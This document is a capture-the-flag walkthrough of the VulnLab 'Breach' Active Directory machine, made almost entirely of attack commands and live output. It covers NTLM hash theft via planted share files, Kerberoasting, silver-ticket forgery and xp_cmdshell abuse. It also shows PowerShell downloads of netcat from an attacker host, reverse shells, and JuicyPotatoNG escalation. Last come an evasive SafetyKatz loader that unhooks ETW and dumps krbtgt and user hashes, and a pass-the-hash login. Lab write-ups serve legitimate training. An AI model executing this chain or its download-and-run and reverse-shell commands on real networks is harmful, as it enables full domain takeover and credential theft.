vulnlab breach
a Medium Windows machine
tools used : ntlm_theft.py , impacket-getPac , impacket-GetUserSPNs , ldapdomaindump , impacket-mssqlclient , JuicyPotatoNG.exe
we create a bunch of files which will lead to a NTLMv2 hash stealing attack using this tool: https://github.com/Greenwolf/ntlm_theft
python ntlm_theft.py -g all -s 10.10.97.69 -f puckie
.
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ smbclient -N -L 10.129.212.120
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
share Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.212.120 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
we find 3 usernames
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ smbclient \\\\10.129.212.120\\share -U Guest
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Sep 8 13:13:00 2025
.. DHS 0 Tue Sep 9 12:35:32 2025
finance D 0 Thu Feb 17 12:19:34 2022
software D 0 Thu Feb 17 12:19:12 2022
transfer D 0 Mon Sep 8 12:13:44 2025
7863807 blocks of size 4096. 1504600 blocks available
smb: \> cd transfer
smb: \transfer\> ls
. D 0 Mon Sep 8 12:13:44 2025
.. D 0 Mon Sep 8 13:13:00 2025
claire.pope D 0 Thu Feb 17 12:21:35 2022
diana.pope D 0 Thu Feb 17 12:21:19 2022
julia.wong D 0 Thu Apr 17 02:38:12 2025
7863807 blocks of size 4096. 1498643 blocks available
smb: \transfer\>
Transfer files
┌──(puck㉿kali)-[~/vulnlab/breach/ntlm_theft/puckie]
└─$ smbclient //10.129.212.120/share -U "Guest"%"" -c 'prompt OFF; cd transfer; lcd /home/puck/vulnlab/breach/untlm_theft/puckie; mput *'
chdir to /home/puck/vulnlab/breach/untlm_theft/puckie failed (No such file or directory)
putting file puckie-(url).url as \transfer\puckie-(url).url (1.7 kb/s) (average 1.7 kb/s)
putting file puckie.scf as \transfer\puckie.scf (2.6 kb/s) (average 2.1 kb/s)
putting file puckie-(icon).url as \transfer\puckie-(icon).url (3.5 kb/s) (average 2.6 kb/s)
┌──(puck㉿kali)-[~/vulnlab/breach/ntlm_theft/puckie]
and get hash with responder
┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.8.2.138]
Responder IPv6 [fe80::e718:d192:5032:1452]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-88BT76XF41N]
Responder Domain Name [FBHG.LOCAL]
Responder DCE-RPC Port [49865]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:1fa52157fd1fca3b:2A0E8B36B448C002767DE27807FE3F48:0101000000000000005034B29DB8DA01623247E1694337960000000002000800460042004800470001001E00570049004E002D0038003800420054003700360058004600340031004E0004003400570049004E002D0038003800420054003700360058004600340031004E002E0046004200480047002E004C004F00430041004C000300140046004200480047002E004C004F00430041004C000500140046004200480047002E004C004F00430041004C0007000800005034B29DB8DA010600040002000000080030003000000000000000010000000020000007196E9E493DFA17295C160C4781E2F23F634A0B97A48BF7DEF201FA24F1CE0E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0032002E003100330038000000000000000000
[*] Skipping previously captured hash for BREACH\Julia.Wong
.
The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.
hashcat -a 0 -m 5600 julia_wong.txt /usr/share/wordlists/rockyou.txt
Having the password now of Julia.Wong
┌──(puck㉿kali)-[~/vulnlab/breach] └─$ nxc smb 10.129.212.120 -u 'julia.wong' -p 'Computer1' SMB 10.129.212.120 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) SMB 10.129.212.120 445 BREACHDC [+] breach.vl\julia.wong:Computer1
Starting with Kerberoasting I get a hash for svc_mssql. Its a service account for the mssql server. In AD when users have the servicePrincipalName or SPN attribute set like with service accounts its possible to request a ticket which is encrypted with the hash derived from the service account’s password.
, we run
┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
KERB_VALIDATION_INFO
LogonTime:
dwLowDateTime: 2560514102
dwHighDateTime: 30942228
LogoffTime:
--snip--
Domain SID: S-1-5-21-2330692793-3312915120-706255856
0000 10 00 00 00 F5 18 12 7A 3C 36 13 6A 18 C4 BD 3F .......z<6.j...?
┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 05:43:08.106169 2024-06-07 05:23:44.260778
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$a6211db7cc5fb5d31bc2338c501b4b7e990dc8cee0c416b2c0d89de679cc95a7ab289f018a43a37c113e2d99b058d51b50ab4fc5c10b3dc54451444f0e129b435d4d7a7302feb22e19e6983fa6493c83ce6910341a4f1e2b6404565a2f272b09b1511faead8cd5e2bfb82ca51b20b8170147af1aa262b62c95f32b8f5e43cedd5a9e76239d33f87be790624c2a2077cf7b2f5a2aecd3d6e9105321a4d150ea3ffbfb4ee7e4a4c9cf45a056ff7df8f6732f08f45d4c5bcfa4f747078ad5ffa29ac4a68950379570e53ddead20f5320635f2b111f39c81e655086451a078db3a0a3159fe2a4289a57ddde3e65b04b3d2942a3d79a95c8a0dca50c5cfe93e52610256c4a069ba51318584e7d0ccbaee4bfeffce4f9aff6b415276f5ee88ebe9623ebeefaf73da42b5239b3fd1b62fa581556d427ec512df3798042a17e062eea1d676be04735fda3d0043705d4f1f9ca87612230b42cad9bfd867f58cba6c26c06332dde93c81f29ddc039ec5a35269a1f003148fac2ffca4a3f7f2b316fcd59401c9b68cabd231aeebb08f41800c9ab7811562eca1c23ac4def78e18af008ce98e8351f1d3afb437f2f325d645e5bfc7177184018cc00e0fed69c375a91887d02e0f4f1e7a025164431f28a922494acca4b4e36d3d6684e7137879d692117b01bd7c27adff6783e887c06a8841f3a8148fbf419805d967a1716693370d5b442bce99756c58bdcdff1f4be584b525cddf4bba0c0e9f82e0f92199b30854306036db6ff868eb5bfe186b30de5afd07837977f3aa462dff42ad1ce63fa743fdbcc267ad45d65adbdd3e30d9f310860a987cbb1aea8ef9eab1f5752a9a3e686c1d3d503fc006e5df3a49c53d2ab3c45e80f78cd5eba2a72530966e1d15d097fb2700150e3eabb451d3cebf1c7abbcc06c02ef06757f59ec2038761610cd6b25ea83ae019f3805fc31ae3cbd9ea9ed193f622b175f2fe2e737e6fed9be29d31f4947a4ec24be9a9f79af713f991ae842010a7079821e76af8ced756f1e2c83370d1940ec99fff26394e01d17cadef7551b053d7b998ca62c1f1f83cd9a3aa6db9eb6dde4a68fe19f2ac49d3efc4f93bebf3f62cf41fa1d1f5c01fa0978a4c1f7c4774482bb4469b00cd59f782ffef40e09cff227614e6c5a807322302be2cc0f4f28492d95a724b561a21884ac94066d8fe8a82ebdf8a51a590b2635a3be34c00170d55815fa286ccdf8ed7c04c0914090ed7e9a39666d5d6533f6b20846b8a398706ec251064d76960f7af521f9a77439585bb2ba2f6397b7bacbdb1ac81bdcd2ee6bbf3c3005923890c538d9c7ba3ccca2984901ed7a696e02a8e1ab6e64aef3f487f1cf118c3714085ac652f9f202e747b501eaa981644639d59bed8d9891fdc407a23faf797239454d948d5290376271e091621b11bd16ee5ecb5cdd80d73a5bf2fdbd60b739c265fd8a4b22e606b86865f3ebffa9c
This hash cracks with john and hashcat
┌──(puck㉿kali)-[~/vulnlab/breach] └─$ john svc*_sql_hash.txt -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Trustno1 (?) 1g 0:00:00:00 DONE (2025-10-29 09:44) 25.00g/s 1331Kp/s 1331Kc/s 1331KC/s chloelouise..spook Use the "--show" option to display all of the cracked passwords reliably Session completed.
.
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ hashcat svc_sql.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$27587cd9b5f8f5fed557b2e02028dfb3$f11493c884adff4f1c8fda7eab664cf08f5621f2b1c5e68d52cd0d19ed7997cceb3ceecada2f6dffb0531dae17b00a4b00f0a07fc9dd8731bfbea9821d386022a3eff776eb0d270dd67f9f53531ff43462e335b4ec0d0d6b4941b810e3faf1d18789db0a8eccb0f88d5929b891c8df73fa9c70d7b3b003e8c4a930923bc7a9a64bbaf41993bec08c3a7da54b79c23a76da231e90b08dfc86d700aaf53fe4387159d2ac1a064f7f9a195c57e1f5147f6e871861b72c7b20599ef2fd2c8719154bf5c87fb6742ae2d4a58f914125c42c46b3457a8667ef165c417bb203de3497cff0d89a3fd026cb7cab9f2110ef50cdbfad181794ad871d4717aa67019fb0ea47df73723123166cd3fba653d17aaa7c54c1a82045451e60ecafe7592e87b06cfce5322c1dfb9d210d24659c68b4f74ee704cc2bb369c4cab99b9f8ba1a83358fda729c9146932caab6c89aa96a1bd7a17d928e756a7dd46d41e83d90206f27752356cdfbe4578c62af4d6024946825f6024a3899cadfd02696562ff5f943da13842352b480dd7b8e175450f5b7a3c7ee7f6de26b8b9c0e9776f0f5d2233a5451057d3b8fc643fb3e26f2d5c81ed331adf850fe9d9bf1d64d33a3b90f5c6f6c332dd4e0066448b9679e641fa0a31c5edb4d7223b308d83ee9b6d68dcd8ea4577197de758f1c223e7f030c3fb7658501e5200744769411b191e1f77fc97431708e0b9383f296b384c987be07031b8b5327262d12bc75fb8c28f2438b2e83618d8d4ea551785da3748999c33fa6b237cc059147d48ad4087a3cecb0984fc59e19fcdecad7ea92738d627392ae8687c5840a3c2833ca337db8300e7f58e6e2b7f0e11c3326d0e8f3691af4ac53f3647251be87fceb282a614f0d7eeefee7cd58b9aa6238c59370cd71b6ea103a99dee04806eb616621096980cd54b74a491c11356ff4a771faaea5f3aa2f67ae5d2f048a57c54265221e50f95700e4f5e1d47f5a4c3ec48112de9584c7e6fb5e30b86159d8797f9bf8e2884f8cb149c985cfd15b6d795ce0693d0156e055e3f737696bc8c4bfa4ead9a8e5618679fcd06732399e2c1ef71444f2019e953e9be37ba76bd460dc01fe256f58cdcdd3cb882d88ab98242917504322ab06af918ce035d1164c818c29a103164d8a39ca6da8a68b22212d72f849a6f89e8faef03f8043dd66bc76ce9bcf133c2d2db867150ae671520b7d1a42de1262756b11047a056e40800239ed34fcdf6af509bd9e9d73957b439910042fe69ead83a21222e428c9ba07eb15a17a3648de5fa6fa98083e88180ccb67e2e05737f5bb069b647fd2af2bfa5b0dd53f8664dda9c3ae21907035fc9045d7c8af8ce71ab1c2d08707f81cc5251de1e571bc53f57dbd761cc6804f42760be182faa3b0e214f9a8cbd31acd0ed0353777039c62808cc166d95cada0ebf21663bcf40783afd5945627ddfadf04c59ffe0ccfeea1b:Trustno1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssq...feea1b
Getting more users
┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
cat domain_users.grep | grep svc
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115
bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69
Silver ticket create with the NTLM hash of the svc_mysql user:
In order to perform a silver ticket attack we require the Domain SID , User NTLM hash & User SPN
┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c
impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
export KRB5CCNAME=administrator.ccache
.
┌──(puck㉿kali)-[~/vulnlab/breach] impacket-mssqlclient -k breachdc.breach.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (BREACH\Administrator dbo@master)>
.
SQL stuff
SQL (BREACH\Administrator dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE
SQL (BREACH\Administrator dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE
SQL (BREACH\Administrator dbo@master)> xp_cmdshell dir "C:\"
output
----------------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is B465-02B6
NULL
Directory of C:\
NULL
08/19/2021 06:24 AM <DIR> EFI
02/17/2022 09:55 AM <DIR> inetpub
05/08/2021 08:20 AM <DIR> PerfLogs
02/17/2022 10:28 AM <DIR> Program Files
02/17/2022 10:27 AM <DIR> Program Files (x86)
02/17/2022 02:11 PM <DIR> share
02/17/2022 01:12 PM <DIR> Users
02/17/2022 03:35 PM <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 11,722,678,272 bytes free
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output
------
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell dir "C:\Temp"
output
--------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is B465-02B6
NULL
Directory of C:\Temp
NULL
06/07/2024 10:34 AM <DIR> .
06/07/2024 10:34 AM 45,272 nc64.exe
1 File(s) 45,272 bytes
1 Dir(s) 11,754,811,392 bytes free
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"
.
Privesc with JuicyPotatoNG
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
breach\svc_mssql
C:\Windows\system32>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
C:\Windows\system32>cd c:\temp
cd c:\temp
c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2024 11:08 AM 153600 JuicyPotatoNG.exe
-a---- 6/7/2024 10:34 AM 45272 nc64.exe
PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>
.
┌──(puck㉿kali)-[~/vulnlab/breach] rlwrap nc -nlvp 445 listening on [any] 445 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454 Microsoft Windows [Version 10.0.20348.558] (c) Microsoft Corporation. All rights reserved. C:\>whoami whoami nt authority\system c:\Users\Administrator\Desktop>hostname hostname BREACHDC
.
Beyond root
"cmd /c C:\Users\Public\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe sekurlsa::evasive-keys exit"
C:\Windows\system32>C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe sekurlsa::evasive-keys exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://10.10.14.34:8000/SafetyKatz.exe Arguments :
.#####. mimikatz 2.2.0 (x64) #19041 Nov 5 2024 21:52:02
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::evasive-keys
Authentication Id : 0 ; 8335143 (00000000:007f2f27)
Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 10/29/2025 9:34:28 AM
SID : S-1-5-96-0-3
* Username : BREACHDC$
* Domain : breach.vl
* Password : 52 2d 49 84 34 de f5 43 a7 09 a8 1a ef 8d e0 25 70 e8 66 9f eb d8 64 05 8f c3 90 70 0d 77 88 36 e4 22 08 80 86 26 9c f4 02 46 1e c9 8d 8e 7e 50 b8 d2 fe 6c 32 cc be f1 c8 a0 cf f5 f6 bd cb a3 4a 8c cc 94 28 7b b9 49 b7 23 84 65 80 0d 7c bc 33 ca 4b ac d3 6e 27 a8 1e 3e 22 7c f2 f3 f2 b1 21 3b c7 38 d6 cc be 50 5c bf 1e cf 55 e8 cc 48 90 43 fc 51 7e c0 1f 4d 17 6b df 8c e9 59 c1 a3 27 03 4e 6f b5 a1 69 99 a1 55 28 16 fe e5 ed e7 5b 64 1c cb 90 ae 7f db e9 da 5f e8 25 cc e5 74 30 41 92 d8 5d 59 bd c8 b9 d9 cc 6f d8 2d d2 3b 4b c9 31 5e fa ae 57 c4 0a b3 0a f8 52 24 37 e8 33 f6 37 1c f4 bb 69 61 23 65 98 d1 0a 72 4e 1a 7f 78 37 ce ec 13 d1 11 44 da bc 3e 4c f1 70 48 12 f9 1b e7 3b f8 a1 49 73 27 8f 0e 9d 8e b1 71
* Key List :
aes256_hmac 57db133d25ef4c3119e44df6fb3052a6009d1b11c2cbf77711d67f0c048e0a0e
aes128_hmac 4379b623157e83033c8afb60dfdf5536
rc4_hmac_nt dd953936e414a1c2e1b4e1a062aa4a22
rc4_hmac_old dd953936e414a1c2e1b4e1a062aa4a22
rc4_md4 dd953936e414a1c2e1b4e1a062aa4a22
rc4_hmac_nt_exp dd953936e414a1c2e1b4e1a062aa4a22
rc4_hmac_old_exp dd953936e414a1c2e1b4e1a062aa4a22
--snip--
Authentication Id : 0 ; 528552 (00000000:000810a8)
Session : Service from 0
User Name : svc_mssql
Domain : BREACH
Logon Server : BREACHDC
Logon Time : 10/29/2025 8:15:23 AM
SID : S-1-5-21-2330692793-3312915120-706255856-1115
* Username : svc_mssql
* Domain : BREACH.VL
* Password : (null)
* Key List :
aes256_hmac acb4bc05dee5b6cd685b7f54810327378726f441e1a780406bfdf5ffeec1686a
rc4_hmac_nt 69596c7aa1e8daee17f8e78870e25a5c
rc4_hmac_old 69596c7aa1e8daee17f8e78870e25a5c
rc4_md4 69596c7aa1e8daee17f8e78870e25a5c
rc4_hmac_nt_exp 69596c7aa1e8daee17f8e78870e25a5c
rc4_hmac_old_exp 69596c7aa1e8daee17f8e78870e25a5c
Authentication Id : 0 ; 513330 (00000000:0007d532)
Session : Interactive from 1
User Name : julia.wong
Domain : BREACH
Logon Server : BREACHDC
Logon Time : 10/29/2025 8:15:13 AM
SID : S-1-5-21-2330692793-3312915120-706255856-1106
* Username : Julia.Wong
* Domain : BREACH.VL
* Password : (null)
* Key List :
aes256_hmac 24870ecb6cd96aa3b89c3b6f24076f3e0ea76dd14e2f21b52037e6b6e5494c11
rc4_hmac_nt b4c8a5ef4dd292edd06b613d2c518ddc
rc4_hmac_old b4c8a5ef4dd292edd06b613d2c518ddc
rc4_md4 b4c8a5ef4dd292edd06b613d2c518ddc
rc4_hmac_nt_exp b4c8a5ef4dd292edd06b613d2c518ddc
rc4_hmac_old_exp b4c8a5ef4dd292edd06b613d2c518ddc
--snip--
mimikatz(commandline) # exit
Bye!
C:\Windows\system32>
.
"cmd /c C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"
C:\Windows\system32>C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit" [+] Successfully unhooked ETW! [+++] NTDLL.DLL IS UNHOOKED! [+++] KERNEL32.DLL IS UNHOOKED! [+++] KERNELBASE.DLL IS UNHOOKED! [+++] ADVAPI32.DLL IS UNHOOKED! [+] URL/PATH : http://10.10.14.34:8000/SafetyKatz.exe Arguments : lsadump::evasive-lsa /patch exit .#####. mimikatz 2.2.0 (x64) #19041 Nov 5 2024 21:52:02 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # lsadump::evasive-lsa /patch Domain : BREACH / S-1-5-21-2330692793-3312915120-706255856 RID : 000001f4 (500) User : Administrator LM : NTLM : ebb948d32f7e896aa0d3934ec7a1b868 RID : 000001f5 (501) User : Guest LM : NTLM : RID : 000001f6 (502) User : krbtgt LM : NTLM : 051e1c9e689e7e4c9fb7164433b9ba8e RID : 00000451 (1105) User : Claire.Pope LM : NTLM : 407269bacd94665e972e2c61c1de7a15 RID : 00000452 (1106) User : Julia.Wong LM : NTLM : b4c8a5ef4dd292edd06b613d2c518ddc RID : 00000453 (1107) User : Hilary.Reed LM : NTLM : 39da4813065bd52215fb5614b956873b RID : 00000454 (1108) User : Diana.Pope LM : NTLM : ee1458cde3182d47514a107afd1236f2 RID : 00000455 (1109) User : Jasmine.Price LM : NTLM : 4c8c779f1e48435bb0bf235afd921988 RID : 00000456 (1110) User : George.Williams LM : NTLM : 8a3891bd96479611d4eec391ca592519 RID : 00000457 (1111) User : Lawrence.Kaur LM : NTLM : 2ed316bf52a9f155fc25440fae777d0f RID : 00000458 (1112) User : Jasmine.Slater LM : NTLM : 6df17991ea82048f8f03734f1f4449c8 RID : 00000459 (1113) User : Hugh.Watts LM : NTLM : 656f2dbe61c431b5ca58a1a5001d51f6 RID : 0000045a (1114) User : Christine.Bruce LM : NTLM : 74eeaab55e418b6247ea35db833da742 RID : 0000045b (1115) User : svc_mssql LM : NTLM : 69596c7aa1e8daee17f8e78870e25a5c RID : 00001bbd (7101) User : puck LM : NTLM : 6dfcb20c87d04f9a4f9605f2413395d4 RID : 000003e8 (1000) User : BREACHDC$ LM : NTLM : dd953936e414a1c2e1b4e1a062aa4a22 mimikatz(commandline) # exit Bye! C:\Windows\system32>
.
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ evil-winrm -i breach.vl -u Administrator -H ebb948d32f7e896aa0d3934ec7a1b868
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
.